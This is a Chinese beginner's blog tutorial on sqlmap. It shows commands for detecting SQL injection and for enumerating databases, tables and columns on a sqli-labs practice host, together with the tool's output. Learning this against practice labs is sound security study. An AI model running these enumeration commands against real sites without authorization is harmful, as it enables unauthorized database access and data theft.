sqlmap入门

一只菜鸡的保安入门之路


环境搭建不想说啥,网上很多,我很菜,折腾了一周多,确实是不难,是我蛋疼

先从一个最基本的命令开始 sqlmap -h

[假装这里有个图片]参数太多了,图有点长,还是不放了吧*

具体的参数可以大概看一下

sqlmap -hh 可以获得完整的说明文档

常用的有下面这几个参数:

1. sqlmap -u <url> 测试一个url是否存在注入

这个url指的是包含请求参数的可能存在注入漏洞的url,比如http://sqli.snowing.com/Less-1/?id=1这样子的

sqlmap -u http://sqli.snowing.com/Less-1/?id=1

sqlmap -u 测试一个url是否存在注入
其中产生的结论信息原文如下:

[22:06:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0

1. 服务器操作系统:Linux Ubuntu 16.04 (xenial)
2. web服务提供应用:Apache 2.4.18
3. 数据库信息:MySQL >= 5.0
2. sqlmap -r <request_info_file> 测试一个包含请求信息的文本文件是否存在注入

文件里面是一个http请求的request信息,大概长这样子:

GET /Less-1/?id=1 HTTP/1.1
Host: sqli.snowing.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

比如用一个名为req_info.txt的文件存放这些信息,则使用 sqlmap -r req_info.txt 来测试文件中的请求是否存在注入

-r 参数一般在存在cookie注入的时候使用,避免设置cookie、post等其他参数
3. sqlmap -u <url> --dbs 查询当前用户下的所有数据库
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --dbs

sqlmap -u  --dbs查询当前用户下的所有数据库
其中产生的结论信息原文如下:

[23:44:26] [INFO] fetching database names
[23:44:26] [WARNING] the SQL query provided does not return any output
[23:44:26] [INFO] used SQL query returns 8 entries
[23:44:26] [INFO] resumed: information_schema
[23:44:26] [INFO] resumed: challenges
[23:44:26] [INFO] resumed: dvwa
[23:44:26] [INFO] resumed: mysql
[23:44:26] [INFO] resumed: performance_schema
[23:44:26] [INFO] resumed: phpmyadmin
[23:44:26] [INFO] resumed: security
[23:44:26] [INFO] resumed: sys
available databases [8]:
[] challenges
[
] dvwa
[] information_schema
[
] mysql
[] performance_schema
[
] phpmyadmin
[] security
[
] sys

测试返回当前用户下所有的数据库名称:
available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] sys
4. sqlmap -u <url> -D <database> --tables 获取指定数据库中的表名
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security --tables

sqlmap -u  -D  --tables获取指定数据库中的表名
其中产生的结论信息原文如下:

[00:02:18] [INFO] fetching tables for database: ‘security’
[00:02:18] [WARNING] the SQL query provided does not return any output
[00:02:18] [INFO] used SQL query returns 4 entries
[00:02:18] [INFO] resumed: emails
[00:02:18] [INFO] resumed: referers
[00:02:18] [INFO] resumed: uagents
[00:02:18] [INFO] resumed: users
Database: security
[4 tables]
±---------+
| emails |
| referers |
| uagents |
| users |
±---------+

得到了如下几个数据表的名称:
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
5. sqlmap -u <url> -D <database> -T <table> --columns 获取表中的字段名
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security -T users --columns

sqlmap -u  -D  -T  --columns获取表中的字段名
上面的测试结果得到了users表中的字段名和对应类型:

[16:35:24] [INFO] fetching columns for table ‘users’ in database ‘security’
[16:35:24] [WARNING] the SQL query provided does not return any output
[16:35:24] [INFO] used SQL query returns 3 entries
[16:35:24] [INFO] retrieved: id
[16:35:24] [INFO] retrieved: int(3)
[16:35:24] [INFO] retrieved: username
[16:35:24] [INFO] retrieved: varchar(20)
[16:35:24] [INFO] retrieved: password
[16:35:24] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
±---------±------------+

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
6. sqlmap -u <url> --current-db 获取当前网站数据库的名称
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --current-db

sqlmap -u  --current-db获取当前网站数据库的名称

[16:45:03] [INFO] fetching current database
[16:45:03] [INFO] retrieved: security
current database: ‘security’

可以看到当前网站的数据库名称是 security

sqlmap 完整参数说明

sqlmap -hh 列出所有的参数信息 放一个搬运的说明

sqlmap参数完整版


>-< 菜鸡求大佬带…

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值